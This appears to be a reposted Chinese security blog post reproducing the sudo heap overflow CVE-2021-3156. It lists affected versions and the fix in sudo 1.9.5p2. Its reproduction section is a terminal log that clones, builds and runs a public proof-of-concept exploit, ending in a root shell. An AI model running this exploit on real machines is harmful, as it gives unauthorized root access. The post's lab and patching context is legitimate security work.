Linux sudo权限提升漏洞(CVE-2021-3156)复现

Linux sudo权限提升漏洞(CVE-2021-3156)复现

Linux sudo权限提升漏洞(CVE-2021-3156)复现

一、漏洞简介

当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。

二、影响版本

Sudo 1.8.2 – 1.8.31p2

Sudo 1.9.0 – 1.9.5p1

不受影响版本

Sudo =>1.9.5p2

三、漏洞复现

执行获取root权限:

Linux sudo权限提升漏洞(CVE-2021-3156)复现

具体操作过程:

[email protected]:~$ git clone https://github.91chifun.workers.dev//https://github.com/blasty/CVE-2021-3156.git

Cloning into ‘CVE-2021-3156’…

warning: redirecting to https://github.com.cnpmjs.org/blasty/CVE-2021-3156.git/

remote: Enumerating objects: 11, done.

remote: Counting objects: 100% (11/11), done.

remote: Compressing objects: 100% (9/9), done.

remote: Total 11 (delta 2), reused 11 (delta 2), pack-reused 0

Unpacking objects: 100% (11/11), done.

[email protected]:~$ cd C

Cerberus/ CVE-2020-13942/ CVE-2020-14882_ALL/ CVE-2020-8193/ CVE-2021-3156/

[email protected]:~$ cd CVE-2021-3156/

[email protected]:~/CVE-2021-3156$ make

rm -rf libnss_X

mkdir libnss_X

gcc -o sudo-hax-me-a-sandwich hax.c

gcc -fPIC -shared -o ‘libnss_X/P0P_SH3LLZ_ .so.2’ lib.c

[email protected]:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty

usage: ./sudo-hax-me-a-sandwich

available targets:

————————————————————

0) Ubuntu 20.04.1 (Focal Fossa) – sudo 1.8.31, libc-2.31

1) Debian 10.0 (Buster) – sudo 1.8.27, libc-2.28

————————————————————

[email protected]:~/CVE-2021-3156$ sudo -V

Sudo version 1.8.21p2

Sudoers policy plugin version 1.8.21p2

Sudoers file grammar version 46

Sudoers I/O plugin version 1.8.21p2

[email protected]:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty

using target: ‘Ubuntu 20.04.1 (Focal Fossa) – sudo 1.8.31, libc-2.31’

** pray for your rootshell.. **

[+] bl1ng bl1ng! We got it!

# id

uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),114(sambashare),500(ubuntu)

#

exp地址:

https://github.com/blasty/CVE-2021-3156

Linux sudo权限提升漏洞(CVE-2021-3156)复现

Linux sudo权限提升漏洞(CVE-2021-3156)复现

操作步骤:

build:$make

list targets:

$./sudo-hax-me-a-sandwich

run:

$./sudo-hax-me-a-sandwich

四、漏洞防护

目前官方已在sudo新版本1.9.5p2中修复了该漏洞,请受影响的用户尽快升级版本进行防护,官方下载链接:

https://www.sudo.ws/download.html

参考:

https://github.com/blasty/CVE-2021-3156

https://blog.csdn.net/Vdieoo/article/details/113247603

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

Linux sudo权限提升漏洞(CVE-2021-3156)复现

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

Linux sudo权限提升漏洞(CVE-2021-3156)复现

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

Linux sudo权限提升漏洞(CVE-2021-3156)复现

相关推荐: CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞

CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞 ​ 一、漏洞简介 Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。 Laravel开启了Debug模式时,由于Laravel自带的Ign…

本文为转载文章,源自互联网,由网络整理整理编辑,转载请注明出处:https://www.hacksafe.net/vuls/5847.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注